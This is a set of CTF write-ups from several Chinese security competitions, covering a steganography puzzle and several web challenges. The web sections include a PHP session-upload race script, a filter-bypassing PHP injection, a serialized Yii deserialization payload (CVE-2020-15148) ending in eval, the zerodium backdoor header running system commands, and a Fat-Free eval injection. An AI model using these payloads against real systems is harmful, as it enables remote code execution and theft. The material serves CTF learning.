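Some recent CTF writeups
1st Guangdong University Student Cybersecurity Attack and Defense Competition (第一届广东大学生网络安全攻防大赛)
Misc
小猪的家 (Piggy's Home)
binwalk -e pig.png extracts an archive, pigpen.zip
Rename the png to gif
Change the colors in stegsolve
QR code fragments show up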

Stitch the fragments together into a QR code; scanning it gives:

JUZFU2C2NJTTETKUKF3Q====
base32 decode:
M2ZhZjg2MTQw
Base64 decode:
3faf86140
This is the archive password
Extracting the archive gives a pigpen cipher

flag{this_isa_pigpen_fake_flag}
CISCN2021
Web
easy_source
A reused challenge; the original:
https://r0yanx.com/2020/10/28/fslh-writeup/

middle_source
https://blog.csdn.net/mochu7777777/article/details/116499336
PHP_SESSION_UPLOAD_PROGRESS + race condition
A directory scan found .listing
It lists you_can_seeeeeeee_me.php
which is a phpinfo page
Many functions are disabled
Use scandir to search under /etc by hand

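Very suspicious
After digging further, it turned out to be nested many directory levels deep
Each team's directory is different
Really...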
```python
import io
import requests
import threading

sessid = 'AAAA'
# cf is pointed at the session file that belongs to sessid.
data = {
    'PHP_SESSION_UPLOAD_PROGRESS': '<?php $a = scandir("/etc/");var_dump($a);?>',
    "field": "abcababaa",
    "cf": "../../../../../../../var/lib/php/sessions/dfhjecdbcc/sess_" + sessid,
}
URL = 'http://121.36.24.90:25186/'


def write(session):
    # Defined in the original script but never started as a thread.
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        resp = session.post(URL,
                            data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php phpinfo();?>'},
                            files={'file': ('AAAA.txt', f)},
                            cookies={'PHPSESSID': sessid})


def read(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        resp = session.post(URL, data=data,
                            files={'file': ('AAAA.txt', f)},
                            cookies={'PHPSESSID': sessid})
        # Print any response whose length differs from 2037.
        if len(resp.text) != 2037:
            print(resp.text)


if __name__ == "__main__":
    event = threading.Event()
    with requests.session() as session:
        for i in range(1, 30):
            threading.Thread(target=read, args=(session,)).start()
    event.set()
```
Red Hat Cup 2021 (红帽杯2021)
Web
find_it
http://eci-2ze5dz17y89pj02zub57.cloudeci1.ichunqiu.com/robots.txt
When I was a child,I also like to read Robots.txt Here is what you want:1ndexx.php
http://eci-2ze5dz17y89pj02zub57.cloudeci1.ichunqiu.com/.1ndexx.php.swp
```php
<?php $link = mysql_connect('localhost', 'root'); ?>
<html>
<head>
	<title>Hello worldd!</title>
	<style>
	body {
		background-color: white;
		text-align: center;
		padding: 50px;
		font-family: "Open Sans","Helvetica Neue",Helvetica,Arial,sans-serif;
	}
		margin-bottom: 40px;
	}
	</style>
</head>
<body>
	<img id="logo" src="logo.png" />
	<h1><?php echo "Hello My freind!"; ?></h1>
	<?php if($link) { ?>
		<h2>I Can't view my php files?!</h2>
	<?php } else { ?>
		<h2>MySQL Server version: <?php echo mysql_get_server_info(); ?></h2>
	<?php } ?>
</body>
</html>
<?php

#Really easy...

$file=fopen("flag.php","r") or die("Unable 2 open!");

$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));

$hack=fopen("hack.php","w") or die("Unable 2 open");

$a=$_GET['code'];

if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
	die("you die");
}
if(strlen($a)>33){
	die("nonono.");
}
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);

fclose($file);
fclose($hack);
?>
```
payload :
index?code=<?php show_source($_GET['a']);?>
hack.php?a=flag.php
This reads back:
```
<?php
flag=MZWGCZ33GU2TSMJZMNRTMLLDGQYDGLJUGI3TELLBGFSTCLLEGVQTEMRYMU3DQYRWMZ6Q====;
echo "What is important for a new bird of php??"
?>
```
http://ctf.ssleye.com/base64.html
Decode it as base32
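Why the find_it payload above gets through, as an added example that is not part of the original writeup or of the challenge's code: the two checks from the leaked 1ndexx.php are reimplemented in Python and run over a few constructed inputs. The names `original_filter`, `explain`, `hardened_filter` and the allowlist pattern are assumptions made for illustration.

```python
import re

# Denylist copied from the leaked 1ndexx.php; PHP's preg_match has no /i
# modifier here, so matching is case-sensitive, as re.search is by default.
DENYLIST = re.compile(
    r'system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|'
    r'replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|'
    r'require|include|proc|open|read|shell|file|put|get|contents|dir|link|'
    r'dl|var|dump')
MAX_LEN = 33  # the page's check: strlen($a) > 33 -> "nonono."


def original_filter(code: str) -> str:
    """Mirror the two checks in 1ndexx.php, in the same order."""
    if DENYLIST.search(code):
        return "you die"
    if len(code.encode()) > MAX_LEN:  # PHP strlen() counts bytes
        return "nonono."
    return "written to hack.php"


def explain(code: str) -> dict:
    """Show what the denylist matched and what it missed only due to case."""
    loose = re.findall(DENYLIST.pattern, code, re.IGNORECASE)
    return {
        "verdict": original_filter(code),
        "bytes": len(code.encode()),
        "hits": sorted(set(DENYLIST.findall(code))),
        "case_only_misses": sorted({m.lower() for m in loose
                                    if not DENYLIST.search(m)}),
    }


# Hypothetical hardening (an assumption, not from the challenge): an allowlist
# of inert characters. The root fix is to never write request data into a
# file the server executes as PHP.
ALLOWED = re.compile(r'[A-Za-z0-9 _.,-]{1,33}')


def hardened_filter(code: str) -> str:
    return "stored" if ALLOWED.fullmatch(code) else "rejected"


if __name__ == "__main__":
    samples = [                                # constructed inputs
        "<?php show_source($_GET['a']);?>",    # payload quoted on the page
        "<?php echo 1;?>",                     # trips the word list
        "A" * 34,                              # trips the length check
        "hello world",                         # inert text
    ]
    for s in samples:
        print(explain(s), hardened_filter(s))
```

The page's payload is 32 bytes, contains no denylisted word (`show_source` is simply not on the list), and its `$_GET` is only missed because the pattern is case-sensitive.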
framework
Source code leak: www.zip
http://eci-2zecqobeh1kk8w7rdiks.cloudeci1.ichunqiu.com:80
https://forum.butian.net/share/56
A reused challenge
CVE-2020-15148
Deserialization
/index.php?r=site%2Fabout&message=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNzoieWlpXHdlYlxEYlNlc3Npb24iOjE6e3M6MTM6IndyaXRlQ2FsbGJhY2siO2E6Mjp7aTowO086MzI6InlpaVxjYWNoaW5nXEV4cHJlc3Npb25EZXBlbmRlbmN5IjoxOntzOjEwOiJleHByZXNzaW9uIjtzOjIwOiJldmFsKCRfR0VUWyJjb2RlIl0pOyI7fWk6MTtzOjE4OiJldmFsdWF0ZURlcGVuZGVuY3kiO319fQ==&code=phpinfo();
Then connect with AntSword and use its disable_functions bypass to finish in one go
Hufu CTF (虎符CTF)
Web
Sign-in (签到)
PHP source code backdoor
Note the header name is agent with an extra t on the end
User-Agentt: zerodiumsystem("cat /flag");

unsetme
Fat-Free framework
Auditing base.php, there is an eval at line 530

Construct the payload
?a=asd&a=asd%0a,$abc);system("ls"
